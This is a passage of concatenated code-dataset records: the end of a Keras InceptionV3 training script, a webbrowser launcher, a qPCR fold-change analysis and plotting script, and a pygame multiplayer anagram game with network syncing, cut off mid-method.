ImageNet\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.applications.inception_v3 import preprocess_input\n\nif preprocess_flag == True:\n datagen = ImageDataGenerator(preprocessing_function=preprocess_input)\n val_datagen = ImageDataGenerator(preprocessing_function=preprocess_input)\nelse:\n datagen = ImageDataGenerator()\n 
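# Note: without preprocess_input these generators pass raw 0-255 pixels\n # through, while InceptionV3's ImageNet weights expect inputs scaled to\n # [-1, 1]; this branch is mainly useful for experimentation.\n 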
val_datagen = ImageDataGenerator()\n\n\n\n# Train the model\nbatch_size = 32\nepochs = 5\n# Note: we aren't using callbacks here since we only are using 5 epochs to conserve GPU time\nmodel.fit_generator(datagen.flow(X_train, y_one_hot_train, batch_size=batch_size), \n steps_per_epoch=len(X_train)/batch_size, epochs=epochs, verbose=1, \n validation_data=val_datagen.flow(X_val, y_one_hot_val, batch_size=batch_size),\n validation_steps=len(X_val)/batch_size)","sub_path":"Archived_Scripts/Given_Sample_Code.py","file_name":"Given_Sample_Code.py","file_ext":"py","file_size_in_byte":10576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"140565464","text":"__author__ = 'tusharsappal'\n\nimport webbrowser\n\n## courtesy Python Cook Book Solution 13.15\n## This script launches the web browser and opens the url http://google.com\n\n\ndef launch_web_browser(url):\n\n webbrowser.open_new(url)\n\n\n\n## Replace the url to be opened through the web browser\nlaunch_web_browser(\"http://www.google.com\")","sub_path":"python_scripts/python_cook_book_receipes/utility_scripts_administration/launch_web_browser.py","file_name":"launch_web_browser.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"162671614","text":"import pandas as pd\nfrom pprint import pprint\nimport itertools\nimport numpy as np\nimport os\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\nimport scipy\nimport matplotlib\n\nqpcr_file ='/Users/idriver/RockLab-files/Tcf_Belo-ctrl-090816_all.txt'\nqpcr_df = pd.read_csv(qpcr_file, delimiter= '\\t')\n\nsns.set_context(\"notebook\", font_scale=1.5, rc={\"lines.linewidth\": 2.5})\nfont = {'family' : 'normal',\n 'size' : 19}\nmatplotlib.rc('font', **font)\n\ndef stars(p):\n if p < 0.0001:\n return \"****\"\n elif (p < 0.001):\n return \"***\"\n elif (p < 0.01):\n return \"**\"\n elif (p < 0.05):\n return \"*\"\n else:\n return \"ns\"\n\nsamples = list(set(qpcr_df['Sample Name']))\ntargets = list(set(qpcr_df['Target Name']))\nsample_dict = {}\nindex_list = []\nfor samp in samples:\n target_dict = {}\n delta_ct_actb_dict = {}\n delta_ct_gapdh_dict = {}\n sample_df = qpcr_df[qpcr_df['Sample Name'] == samp]\n for targ in targets:\n target_df = sample_df[(sample_df['Target Name'] == targ)]\n targ_mean = pd.to_numeric(target_df['CT']).mean()\n target_dict[targ] = targ_mean\n index_list.append(samp)\n for targ2 in targets:\n actb_mean = target_dict['Actb']\n gapdh_mean = target_dict['Gapdh']\n if targ2 != 'Actb':\n delta_ct_actb = actb_mean - target_dict[targ2]\n else:\n delta_ct_actb = 0\n if targ2 != 'Gapdh':\n delta_ct_gapdh = gapdh_mean - target_dict[targ2]\n else:\n delta_ct_gapdh = 0\n delta_ct_actb_dict[targ2] = delta_ct_actb\n delta_ct_gapdh_dict[targ2] = delta_ct_gapdh\n sample_dict[samp] = target_dict\n sample_dict['delta_ct_actb_'+samp] = delta_ct_actb_dict\n sample_dict['delta_ct_gapdh_'+samp] = delta_ct_gapdh_dict\ndelta_pairs = []\nfor samp1,samp2 in itertools.permutations(samples,2):\n if samp1 != samp2 and 'Norm' in samp2 and 'Bleo' in samp1 and 'Socs3' not in samp1 and 'Norm2' not in samp2:\n delta_pairs.append((samp1,samp2))\nresults_df = pd.DataFrame.from_dict(sample_dict)\ngene_df_list = []\nfor p in delta_pairs:\n pow_dict = dict(zip(targets,[2 for t in targets]))\n ratio_dict = {'pos_dict_a':sample_dict['delta_ct_actb_'+p[0]],'neg_dict_a':sample_dict['delta_ct_actb_'+p[1]], 
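\n # Per gene, the fold change computed below is 2**dCt(sample) / 2**dCt(control);\n # since dCt here is reference Ct minus target Ct, this is equivalent to the\n # standard 2^-ddCt method, with Actb and Gapdh as the two reference genes.\n 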
'pos_dict_g':sample_dict['delta_ct_gapdh_'+p[0]], 'neg_dict_g':sample_dict['delta_ct_gapdh_'+p[1]], 'pwer':pow_dict}\n\n pair_df = pd.DataFrame.from_dict(ratio_dict)\n by_gene_df = pair_df.transpose()\n new_index_dict ={}\n for i in by_gene_df.index.tolist():\n new_index_dict[i]= i+'_'+p[0]+'_to_'+p[1]\n by_gene_df.rename(new_index_dict, inplace=True)\n gene_df_list.append(by_gene_df)\n pwer_df = pair_df['pwer']\n ratio_df_a = pd.DataFrame(pwer_df.pow(pair_df['pos_dict_a'])/pwer_df.pow(pair_df['neg_dict_a']), columns=[p[0]+'_to_'+p[1]+'_ratio_Actb'])\n ratio_df_g = pd.DataFrame(pwer_df.pow(pair_df['pos_dict_g'])/pwer_df.pow(pair_df['neg_dict_g']), columns=[p[0]+'_to_'+p[1]+'_ratio_Gapdh'])\n\n fc_all = pd.merge(ratio_df_a,ratio_df_g, right_index=True, left_index=True)\n\n all_results = pd.merge(results_df,fc_all, right_index=True, left_index=True)\n results_df = all_results.copy()\nall_gene_df = pd.concat(gene_df_list)\n\n\nplot_df_dict = {}\ntarget_list = results_df.index.tolist()\n\nresults_df.to_csv(os.path.join(os.path.dirname(qpcr_file), 'qpcr_results_'+qpcr_file.split('/')[-1]), sep='\\t')\n\nplot_df_dict['Target'] = []\nplot_df_dict['Ratio Bleo to Saline Control'] = []\nplot_df_dict['Control'] = []\nselected_genes= ['Actb', 'Gapdh', 'Col3a1', 'Col1a2','Acta2','Pdgfra', 'G0s2', 'Tcf21', 'Col14a1']\n\npos_df_a = all_gene_df[all_gene_df.index.map(lambda x: 'pos_dict_a' in x)]\nneg_df_a = all_gene_df[all_gene_df.index.map(lambda x: 'neg_dict_a' in x)]\npos_df_g = all_gene_df[all_gene_df.index.map(lambda x: 'pos_dict_g' in x)]\nneg_df_g = all_gene_df[all_gene_df.index.map(lambda x: 'neg_dict_g' in x)]\nstats_dict = {}\nfor gene in selected_genes:\n stats_dict[gene+'_a'] = scipy.stats.f_oneway(pos_df_a[gene],neg_df_a[gene])\n stats_dict[gene+'_g'] = scipy.stats.f_oneway(pos_df_g[gene],neg_df_g[gene])\nstats_df = pd.DataFrame.from_dict(stats_dict)\n\nratio_df = results_df[[n for n in results_df.columns.values if 'ratio' in n]]\nselected_ratio_df = ratio_df.loc[selected_genes]\nselected_ratio_df.reindex(selected_genes)\nplot_controls = 'Gapdh' #values can be 'Actb' 'Gapdh' or both\n\nfor t in [n for n in selected_ratio_df.columns.values if 'ratio' in n]:\n control_name = t.split('_')[-1]\n if plot_controls == 'Actb':\n if control_name == 'Actb':\n plot_df_dict['Target']= plot_df_dict['Target']+ selected_genes\n plot_df_dict['Ratio Bleo to Saline Control']= plot_df_dict['Ratio Bleo to Saline Control'] +selected_ratio_df[t].tolist()\n plot_df_dict['Control'] = plot_df_dict['Control']+[control_name]*len(selected_genes)\n elif plot_controls == 'Gapdh':\n if control_name == 'Gapdh':\n plot_df_dict['Target']= plot_df_dict['Target']+ selected_genes\n plot_df_dict['Ratio Bleo to Saline Control']= plot_df_dict['Ratio Bleo to Saline Control'] +selected_ratio_df[t].tolist()\n plot_df_dict['Control'] = plot_df_dict['Control']+[control_name]*len(selected_genes)\n elif plot_controls == 'both':\n plot_df_dict['Target']= plot_df_dict['Target']+ selected_genes\n plot_df_dict['Ratio Bleo to Saline Control']= plot_df_dict['Ratio Bleo to Saline Control'] +selected_ratio_df[t].tolist()\n plot_df_dict['Control'] = plot_df_dict['Control']+[control_name]*len(selected_genes)\n\nplot_df = pd.DataFrame.from_dict(plot_df_dict)\nplot_df.to_csv(os.path.join(os.path.dirname(qpcr_file), 'qpcr_plot_df_selected_'+qpcr_file.split('/')[-1]), sep='\\t')\n\nfig, ax = plt.subplots()\nsns.boxplot(x='Target', y='Ratio Bleo to Saline Control', hue = 'Control', data=plot_df, ax = ax)\nadd_on =0\nymax = plot_df['Ratio Bleo to Saline 
Control'].max()\ny_min = plot_df['Ratio Bleo to Saline Control'].min()\npos = np.arange(len(set(plot_df['Target'])))\nax.yaxis.set_ticks(np.arange(0,ymax+5,1))\nax.set_ylim([0,ymax+1])\nfor tick, label in zip(range(len(set(plot_df['Target']))), plot_df['Target']):\n if plot_controls =='Actb':\n p_value_a = stats_df[label+'_a'][1]\n df_1 = plot_df[(plot_df['Target']==label)&(plot_df['Control']=='Actb')]\n ratio_a = df_1['Ratio Bleo to Saline Control'].mean()\n ax.text(pos[tick], ymax + 1.2, \"%.1f\" % ratio_a,horizontalalignment='center', color='blue')\n ax.text(pos[tick], ymax + abs(ymax - y_min)*0.1, stars(p_value_a),\n horizontalalignment='center',\n verticalalignment='center', color='black')\n elif plot_controls =='Gapdh':\n p_value_g = stats_df[label+'_g'][1]\n df_2 = plot_df[(plot_df['Target']==label)&(plot_df['Control']=='Gapdh')]\n ratio_g = df_2['Ratio Bleo to Saline Control'].mean()\n ax.text(pos[tick], ymax+1.2, \"%.1f\" % ratio_g,horizontalalignment='center', color='blue')\n ax.text(pos[tick], ymax + abs(ymax - y_min)*0.1, stars(p_value_g),\n horizontalalignment='center',\n verticalalignment='center', color='black')\n elif plot_controls =='both':\n df_1 = plot_df[(plot_df['Target']==label)&(plot_df['Control']=='Actb')]\n df_2 = plot_df[(plot_df['Target']==label)&(plot_df['Control']=='Gapdh')]\n p_value_a = stats_df[label+'_a'][1]\n p_value_g = stats_df[label+'_g'][1]\n ratio_a = df_1['Ratio Bleo to Saline Control'].mean()\n ratio_g = df_2['Ratio Bleo to Saline Control'].mean()\n print(df_2)\n ax.text(pos[tick]-0.15, ymax + 1.2, \"%.1f\" % ratio_a,\n horizontalalignment='center', color='blue')\n ax.text(pos[tick], ymax + -0.4 +abs(ymax - y_min)*0.1, stars(p_value_a),\n horizontalalignment='center',\n verticalalignment='center', color='blue')\n ax.text(pos[tick]+0.15, ymax + 1.2, \"%.1f\" % ratio_g,\n horizontalalignment='center', color='green')\n ax.text(pos[tick], ymax +0.2 + abs(ymax - y_min)*0.1, stars(p_value_g),\n horizontalalignment='center',\n verticalalignment='center', color='green')\n\nax.text(pos[tick]+1, ymax + abs(ymax - y_min)*0.1, 'p-value',\n horizontalalignment='center',\n verticalalignment='center', color='black')\nax.text(pos[tick]+1, ymax + 1.2, 'Ratio Mean',\n horizontalalignment='center',\n verticalalignment='center', color='blue')\n\nax.legend_.remove()\n\nplt.show()\n","sub_path":"qpcr3.py","file_name":"qpcr3.py","file_ext":"py","file_size_in_byte":8580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"374813000","text":"import itertools\nimport random\nimport twl\nfrom collections import Counter\nimport time\nfrom network_new import Network # UPDATE\nimport ast\nimport datetime\nfrom itertools import combinations\n\nimport api\n\nimport pygame, sys\nfrom pygame.locals import *\n\nprint_check = True\ntime_check = False\nno_prefix_suffix = True\n\nnot_allowed_prefixes = ['UN', 'RE']\nnot_allowed_suffixes = ['S', 'ED', 'D', 'ES', 'ER', 'R', 'OR', 'ING', 'EST', 'IEST', 'LY', 'TION', 'SION']\n\nword_add_twl = ['acai', 'roo', 'tix']\n\nFPS = 30\nWINDOWWIDTH = 640\nWINDOWHEIGHT = 640\n\n# Colors\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nNAVYBLUE = (60, 60, 100)\nGREEN = (0, 255, 0)\nBLUE = (0, 0, 255)\n\nBGCOLOR = WHITE\nTEXTCOLOR = BLACK\n\nflip_delay = 1000 # Delay before flip in ms\nflip_status = ''\n\nletters = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']\nletter_freq = {'A': 13, 'B': 3, 'C': 3, 'D': 6, 'E': 18, 'F': 
3, 'G': 4, 'H':3, 'I':12, 'J':2, 'K':2, 'L':5, 'M':3, 'N':8, 'O':11, 'P':3, 'Q':2, 'R':9, 'S':6, 'T':9, 'U': 6, 'V':3, 'W':3, 'X':2, 'Y':3, 'Z':2}\n# one key constant per letter, aligned with the 26 entries of `letters`\nletter_keys = [K_a, K_b, K_c, K_d, K_e, K_f, K_g, K_h, K_i, K_j, K_k, K_l, K_m, K_n, K_o, K_p, K_q, K_r, K_s, K_t, K_u, K_v, K_w, K_x, K_y, K_z]\n\n# ________\n# | LAYOUT |\n# --------\n\n# 'Current'\nfont_current = 'freesansbold.ttf'\nsize_current = 32\ncolor_current = BLACK\nx_current = 10\ny_current = 20\n\n\n# Ready Flip\nfont_flip = 'freesansbold.ttf'\nsize_flip = 20\ncolor_flip = BLACK\nx_flip = 20\ny_flip = 60\n\n# Tiles\nfont_tile = 'freesansbold.ttf'\nsize_tile = 32\ncolor_tile = BLACK\nx_tile_0 = 150\ny_tile_0 = 38\nx_gap_tile = 30\ny_gap_tile = 50\n\n# 'Your Words'\nfont_your = 'freesansbold.ttf'\nsize_your = 32\ncolor_your = BLACK\nx_your = 10\ny_your = 100\ny_gap_your = 50\n\n# Your Words\nfont_words = 'freesansbold.ttf'\nsize_words = 32\ncolor_words = BLACK\nx_words = 10\ny_words = y_your + y_gap_your\nx_gap_words = 150\ny_gap_words = 50\n\n# 'Opponent's Words'\nfont_opp = 'freesansbold.ttf'\nsize_opp = 32\ncolor_opp = BLACK\nx_opp = 300\ny_opp = 100\ny_gap_opp = 50\n\n# Opponent's Words\nfont_opp_words = 'freesansbold.ttf'\nsize_opp_words = 32\ncolor_opp_words = BLACK\nx_opp_words = 300\ny_opp_words = y_opp + y_gap_opp\nx_gap_opp_words = 150\ny_gap_opp_words = 50\n\ncolor_taken = BLUE\n\n# Guess\nfont_guess = 'freesansbold.ttf'\nsize_guess = 32\ncolor_guess = BLACK\nx_guess = 10\ny_guess = 500\n\n# Status\nfont_status = 'freesansbold.ttf'\nsize_status = 24\ncolor_status = BLACK\nx_status = 10\ny_status = 550\n\ndef numwords_to_fontsize(numwords):\n if numwords <= 6:\n return int(size_words/1.25), int(y_gap_words/1.25)\n elif 6 < numwords <= 10:\n return int(size_words / 1.75), int(y_gap_words / 1.75)\n elif 10 < numwords <= 20:\n return int(size_words / 2), int(y_gap_words / 2)\n elif 20 < numwords <= 50:\n return int(size_words / 3), int(y_gap_words / 3)\n\ndef numtiles_to_fontsize(numtiles):\n if numtiles <= 10:\n return size_tile, y_gap_tile, x_gap_tile\n elif 10 < numtiles <= 40:\n return int(size_tile / 1.5), int(y_gap_tile / 1.5), int(x_gap_tile / 1.5)\n elif 40 < numtiles <= 60:\n return int(size_tile / 2), int(y_gap_tile / 2), int(x_gap_tile / 2)\n elif 60 < numtiles <= 144:\n return int(size_tile / 4), int(y_gap_tile / 4), int(x_gap_tile / 4)\n\ndef try_parsing_date(text):\n for fmt in ('%Y-%m-%d %H:%M:%S.%f', '%Y-%m-%d %H:%M:%S'):\n try:\n return datetime.datetime.strptime(text, fmt)\n except ValueError:\n pass\n raise ValueError('no valid date format found')\n\nclass banana(object):\n def __init__(self):\n\n # -------- #\n # BANANA #\n # -------- #\n\n\n self.take_dict = {'new_word': '', 'etyms_new_word': '', 'take_time': 0,\n 'used_tiles': [], 'self_taken_words': [], 'opp_taken_words': [],\n 'self_taken_is':[], 'opp_taken_is':[]}\n\n self.take_dict_past = {'new_word': '', 'etyms_new_word': '', 'take_time': 0,\n 'used_tiles': [], 'self_taken_words': [], 'opp_taken_words': [],\n 'self_taken_is':[], 'opp_taken_is':[]}\n\n self.flip_dict = {'flip_status': '', 'flip_waiting': False,\n 'scheduled_flip': 0}\n\n\n # Game state\n self.tiles = []\n self.current = []\n self.playerwords = {}\n self.playerwords_list = []\n self.player2words = {}\n self.player2words_list = []\n self.guess = ''\n self.previous_guess = ''\n self.status = ''\n self.last_update = 0\n self.player2_last_update = 0\n self.mode = 'waiting'\n self.frozen = False\n self.take_waiting = False\n self.i_flipped = False\n\n # Previous game state\n 
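# Snapshots of the shared state, kept so that a conflicting take reported\n # by the opponent can be rolled back (see the SNAFU branch in\n # get_server_update).\n 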
self.tiles_past = []\n self.current_past = []\n self.playerwords_past = {}\n self.playerwords_list_past = []\n self.player2words_past = {}\n self.player2words_list_past = []\n\n # Things in flip timer dict\n \"\"\"\n self.flip_waiting = False\n self.time_flip = pygame.time.get_ticks()\n \"\"\"\n\n # things in the take dict\n \"\"\"\n self.middle_used = []\n self.taken_word = \"\\'\\'\"\n self.take_start_time = 0\n self.used_tiles = []\n \"\"\"\n\n # not added to a dict\n self.player2current = []\n self.player2tiles = []\n self.take_end_time = 0\n\n self.who_took = ''\n self.taken_i = -1\n self.new_word_i = -1\n self.new_word = ''\n\n # Graphics\n self.fontObj_current = pygame.font.Font(font_current, size_current)\n self.fontObj_tile = pygame.font.Font(font_tile, size_tile)\n self.fontObj_your = pygame.font.Font(font_your, size_your)\n self.fontObj_words = pygame.font.Font(font_words, size_words)\n self.fontObj_guess = pygame.font.Font(font_guess, size_guess)\n self.fontObj_status = pygame.font.Font(font_status, size_status)\n self.fontObj_flip = pygame.font.Font(font_flip, size_flip)\n self.fontObj_opp = pygame.font.Font(font_your, size_your)\n self.fontObj_opp_words = pygame.font.Font(font_words, size_words)\n\n self.currentSurfObj = self.fontObj_current.render('Current: ', True, color_current)\n self.tilesSurfObj_list = []\n self.yourSurfObj = self.fontObj_your.render('Your Words: ', True, color_your)\n self.playerwordsSurfObj_list = []\n self.oppSurfObj = self.fontObj_opp.render('Opponent\\'s Words: ', True, color_opp)\n self.player2wordsSurfObj_list = []\n self.guessSurfObj = self.fontObj_guess.render('Take: ' + self.guess, True, color_guess)\n self.statusSurfObj = self.fontObj_status.render(self.status, True, color_status)\n self.flipSurfObj = self.fontObj_flip.render(self.flip_dict['flip_status'], True, color_flip)\n\n self.graphics_to_update = []\n\n self.y_gap_words = y_gap_words\n self.y_gap_opp_words = y_gap_opp_words\n self.x_gap_tile = x_gap_tile\n self.y_gap_tile = y_gap_tile\n\n\n # Initialization variables\n self.game_start_time = 0\n self.host = False\n self.seed_set = False\n self.seed = 0\n\n print(\"Initializing network\")\n # Network\n self.net = Network()\n\n print(\"Finished initializing network\")\n\n # For time checks\n self.time_dict = {'loop': 0, 'send_data': 0, 'take': 0, 'update_graphics': 0,\n 'display_graphics': 0, 'send_parse': 0, 'update_players': 0}\n\n self.last_type = time.time() - 1\n\n self.same_root_word = ''\n\n print(\"gonna do first server update\")\n # Perform an initial server update\n self.get_server_update()\n print(\"finished first server update\")\n\n # If you receive a invalid seed, there's no opponent and you should set the seed yourself\n # If you do receive a valid seed, there's already an opponent and take their seed\n if self.seed_recv < 1:\n self.seed = random.randint(1, 100000)\n self.seed_set = True\n else:\n self.seed = self.seed_recv\n\n # Set the tiles and shuffle them\n for letter in letters:\n self.tiles = self.tiles + list(itertools.repeat(letter, letter_freq[letter]))\n random.shuffle(self.tiles)\n\n def send_data(self):\n if time_check:\n start_time = time.time()\n # print(f\"NET ID: {self.net.id}\")\n data = str(self.net.id) + \"|\" + str(self.seed) + \"|\" + str(self.last_update) + \"|\" + str(self.take_dict) + \"|\" + str(self.flip_dict)\n # print(f\"DATA TO SEND: {data}\")\n reply = self.net.send(data)\n # print(f\"DATA RECEIVED: {reply}\")\n\n if time_check:\n end_time = time.time()\n self.time_dict['send_data'] = 
end_time - start_time\n\n return reply\n\n @staticmethod\n def parse_data(data):\n try:\n # print(f\"DATA TO PARSE: {data}\")\n split = data.split('|')\n net_id = ast.literal_eval(split[0])\n seed_recv = ast.literal_eval(split[1])\n last_update_recv = ast.literal_eval(split[2])\n take_dict_recv = ast.literal_eval(split[3])\n flip_timer_dict_recv = ast.literal_eval(split[4])\n\n return net_id, seed_recv, last_update_recv, take_dict_recv, flip_timer_dict_recv\n except Exception:\n # fall back to neutral values with the same types as the success path\n return -1, 0, 0, {}, {}\n\n def flip(self):\n if not self.tiles:\n self.status = f\"No more tiles! Your score: {sum([len(i) for i in self.playerwords_list])}, Opponent's score: {sum([len(i) for i in self.player2words_list])}\"\n self.graphics_to_update = self.graphics_to_update + ['status']\n return None\n\n # self.last_update = time.time()\n last = self.tiles.pop()\n self.current.append(last)\n self.flip_dict['flip_status'] = ''\n self.flip_dict['flip_waiting'] = False\n\n self.graphics_to_update = self.graphics_to_update + ['tiles', 'flip']\n\n def __cleared_take_dict(self):\n cleared_dict = ({'new_word': '', 'etyms_new_word': '', 'take_time': 0,\n 'used_tiles': [], 'self_taken_words': [], 'opp_taken_words': [],\n 'self_taken_is': [], 'opp_taken_is': []}).copy()\n\n return cleared_dict\n\n def __is_cleared(self, dict):\n return dict['take_time'] == 0\n\n def __superset(self, word1, word2, strict = False):\n # Can word 1 take word 2?\n word1_counter = Counter(word1)\n word2_counter = Counter(word2)\n\n if strict:\n return (word1_counter - word2_counter and not (word2_counter - word1_counter))\n else:\n return (word1_counter - word2_counter and not(word2_counter - word1_counter)) or (not (word1_counter - word2_counter) and not (word2_counter - word1_counter))\n\n def __subtract(self, word1, word2):\n # Subtract word2 from word1 (e.g. 'test' - 'tst' = 'e')\n\n list1 = list(word1)\n for letter in word2:\n list1.remove(letter)\n\n # Turn list into string\n str = ''\n str = str.join(list1)\n\n return str\n\n def __check_steal(self, candidate, etyms_candidate):\n # Check whether a steal happens\n # Input a candidate word (i.e. guess), its merriam stripped version,\n # a dictionary with the words to take from (plus their merriam stripped versions) and\n # a Boolean indicating whether we're checking a steal from the opponent\n\n # Returns whether stolen, what kind of steal or error, the taken word, and index of taken word\n\n # Set event_type to 'tiles' arbitrarily\n error_type = 'tiles'\n\n # Dictionary with all the words that need middle tiles, to check if multi-word steal is possible\n # Each value is a tuple (index, bool indicating if self not opp, word_etym)\n lacks_middle_tiles = {}\n\n # First check if can steal opponent's word\n for i, word in enumerate(self.player2words_list):\n # First, check if candidate is a superset of the current word\n if self.__superset(candidate, word, strict=True):\n\n # Then, check if the tiles needed to make candidate are in the middle\n used_tiles = self.__subtract(candidate, word)\n if not self.__superset(self.current, used_tiles):\n if error_type != 'trivial':\n error_type = 'tiles'\n lacks_middle_tiles[word] = (i, False, self.player2words[word])\n else:\n etyms_word = self.player2words[word]\n\n try:\n # Check for any common roots. 
If etymonline returns nothing, then assume there are no\n # common roots\n root_overlap = any(x in etyms_candidate for x in etyms_word)\n except TypeError:\n root_overlap = False\n\n if root_overlap:\n self.same_root_word = word\n self.root = set(etyms_candidate).intersection(etyms_word).pop()\n error_type = 'trivial'\n else:\n taken_word = word\n taken_i = i\n return True, used_tiles, [], [taken_word], [], [taken_i]\n\n # Check if can steal own word\n for i, word in enumerate(self.playerwords_list):\n # First, check if candidate is a superset of the current word\n if self.__superset(candidate, word, strict=True):\n\n # Then, check if the tiles needed to make candidate are in the middle\n used_tiles = self.__subtract(candidate, word)\n if not self.__superset(self.current, used_tiles):\n if error_type != 'trivial':\n error_type = 'tiles'\n lacks_middle_tiles[word] = (i, True, self.playerwords[word])\n else:\n etyms_word = self.playerwords[word]\n\n try:\n # Check for any common roots. If etymonline returns nothing, then assume there are no\n # common roots\n root_overlap = any(x in etyms_candidate for x in etyms_word)\n except TypeError:\n root_overlap = False\n\n if root_overlap:\n self.same_root_word = word\n self.root = set(etyms_candidate).intersection(etyms_word).pop()\n error_type = 'trivial'\n else:\n taken_word = word\n taken_i = i\n return True, used_tiles, [taken_word], [], [taken_i], []\n\n # Check if can steal middle word\n if self.__superset(self.current, candidate, strict=False):\n return True, list(candidate), [], [], [], []\n\n # Check for multi-word steals\n if len(lacks_middle_tiles) >= 2:\n for word1, word2 in combinations(lacks_middle_tiles, 2):\n if self.__superset(candidate, word1 + word2, strict=False):\n\n # Then, check if the tiles needed to make candidate are in the middle\n used_tiles = self.__subtract(candidate, word1 + word2)\n if self.__superset(self.current, used_tiles):\n etyms_word1 = lacks_middle_tiles[word1][2]\n etyms_word2 = lacks_middle_tiles[word2][2]\n\n try:\n # Check for any common roots. If etymonline returns nothing, then assume there are no\n # common roots\n root_overlap1 = any(x in etyms_candidate for x in etyms_word1)\n except TypeError:\n root_overlap1 = False\n try:\n root_overlap2 = any(x in etyms_candidate for x in etyms_word2)\n except TypeError:\n root_overlap2 = False\n\n if root_overlap1:\n self.same_root_word = word1\n self.root = set(etyms_candidate).intersection(etyms_word1).pop()\n error_type = 'trivial'\n elif root_overlap2:\n self.same_root_word = word2\n self.root = set(etyms_candidate).intersection(etyms_word2).pop()\n error_type = 'trivial'\n\n else:\n self_taken_words = [word for word in [word1, word2] if lacks_middle_tiles[word][1]]\n opp_taken_words = [word for word in [word1, word2] if not lacks_middle_tiles[word][1]]\n\n self_taken_is = [lacks_middle_tiles[word][0] for word in self_taken_words]\n opp_taken_is = [lacks_middle_tiles[word][0] for word in opp_taken_words]\n\n return True, used_tiles, self_taken_words, opp_taken_words, self_taken_is, opp_taken_is\n\n if error_type == 'trivial':\n self.status = \"Same root! \" + f\"({self.same_root_word} and {candidate} share root {self.root})\"\n self.graphics_to_update = self.graphics_to_update + ['status', 'guess']\n return False, [], [], [], []\n elif error_type == 'tiles':\n self.status = \"Tiles aren't there! 
\" + f\"({candidate})\"\n self.graphics_to_update = self.graphics_to_update + ['status', 'guess']\n return False, [], [], [], []\n\n def take(self, candidate):\n self.take_dict['used_tiles'] = []\n\n if time_check:\n start_time = time.time()\n\n self.take_dict['take_time'] = time.time()\n\n # First check if has 3 letters\n if len(candidate) < 3:\n self.status = \"Word is too short! \" + f\"({candidate})\"\n self.guess = ''\n self.graphics_to_update = self.graphics_to_update + ['status', 'guess']\n return None\n\n # Then check if a word\n if len(candidate) < 10:\n candidate_lower = candidate.lower()\n is_word = twl.check(candidate_lower) or candidate_lower in word_add_twl\n else:\n is_word = api.get_word_data(candidate)\n if not is_word:\n # self.__display_text(\"Not a word!\", 200, 400)\n self.status = \"Not a word! \" + f\"({candidate})\"\n self.guess = ''\n self.graphics_to_update = self.graphics_to_update + ['status', 'guess']\n return None\n\n # If no prefixes and suffixes rule, check that\n if no_prefix_suffix:\n has_prefix_suffix, prefix, suffix = api.get_prefix_suffix(candidate)\n # print(f\"Stuff: {has_prefix_suffix}, {prefix}, {suffix}\")\n # print(f\"{prefix in not_allowed_prefixes}, {suffix in not_allowed_suffixes}\")\n if has_prefix_suffix and (prefix in not_allowed_prefixes or suffix in not_allowed_suffixes):\n self.status = \"Prefix / suffix not allowed!\"\n self.guess = ''\n self.graphics_to_update = self.graphics_to_update + ['status', 'guess']\n return None\n\n etyms_candidate = api.get_etym(candidate)\n\n is_taken, used_tiles, self_taken_words, opp_taken_words, self_taken_is, opp_taken_is = self.__check_steal(candidate, etyms_candidate)\n\n if is_taken:\n self.take_dict['new_word'] = candidate\n self.take_dict['etyms_new_word'] = etyms_candidate\n self.take_dict['take_time'] = self.take_dict['take_time']\n self.take_dict['used_tiles'] = used_tiles\n self.take_dict['self_taken_words'] = self_taken_words\n self.take_dict['opp_taken_words'] = opp_taken_words\n self.take_dict['self_taken_is'] = self_taken_is\n self.take_dict['opp_taken_is'] = opp_taken_is\n\n self.take_waiting = True\n self.take_waiting_time = time.time()\n\n # Make a copy of current game state in case we need to backtrack\n self.tiles_past = self.tiles.copy()\n self.current_past = self.current.copy()\n self.playerwords_past = self.playerwords.copy()\n self.playerwords_list_past = self.playerwords_list.copy()\n self.player2words_past = self.player2words.copy()\n self.player2words_list_past = self.player2words_list.copy()\n\n if self.mode == 'solo':\n self.update_take('self', self.take_dict)\n\n\n self.guess = ''\n if time_check:\n end_time = time.time()\n self.time_dict['take'] = end_time - start_time\n\n def update_take(self, robber, take_dict):\n for letter in take_dict['used_tiles']:\n self.current.remove(letter)\n\n if robber == 'self':\n self.last_update = take_dict['take_time']\n\n self.playerwords.update({take_dict['new_word']: take_dict['etyms_new_word']})\n if take_dict['self_taken_is']:\n self.playerwords_list[take_dict['self_taken_is'][0]] = take_dict['new_word']\n else:\n self.playerwords_list.append(take_dict['new_word'])\n\n # Delete any taken words from own dictionary and list\n for j in range(1, len(take_dict['self_taken_is'])):\n del self.playerwords_list[take_dict['self_taken_is'][j]]\n\n for word in take_dict['self_taken_words']:\n if word not in self.playerwords_list:\n del self.playerwords[word]\n\n # Delete any taken words from opp's dictionary and list\n for j in 
range(len(take_dict['opp_taken_is'])):\n del self.player2words_list[take_dict['opp_taken_is'][j]]\n\n for word in take_dict['opp_taken_words']:\n if word not in self.player2words_list:\n del self.player2words[word]\n\n if take_dict['self_taken_words'] or take_dict['opp_taken_words']:\n taken_words_string = ' '.join(\n str(take_dict['self_taken_words'] + take_dict['opp_taken_words']).split(\"'\")[1:-1])\n self.status = \"Success! \" + f\"({taken_words_string} -> {take_dict['new_word']})\"\n else:\n self.status = \"Success! \" + f\"({take_dict['new_word']} from the middle)\"\n\n else:\n self.last_update = self.take_dict['take_time']\n\n self.player2words.update({take_dict['new_word']: take_dict['etyms_new_word']})\n if take_dict['opp_taken_is']:\n self.player2words_list[take_dict['opp_taken_is'][0]] = take_dict['new_word']\n else:\n self.player2words_list.append(take_dict['new_word'])\n\n # Delete any taken words from own dictionary and list\n for j in range(0, len(take_dict['self_taken_is'])):\n del self.playerwords_list[take_dict['self_taken_is'][j]]\n\n for word in take_dict['self_taken_words']:\n if word not in self.playerwords_list:\n del self.playerwords[word]\n\n # Delete any taken words from opp's dictionary and list\n for j in range(1, len(take_dict['opp_taken_is'])):\n del 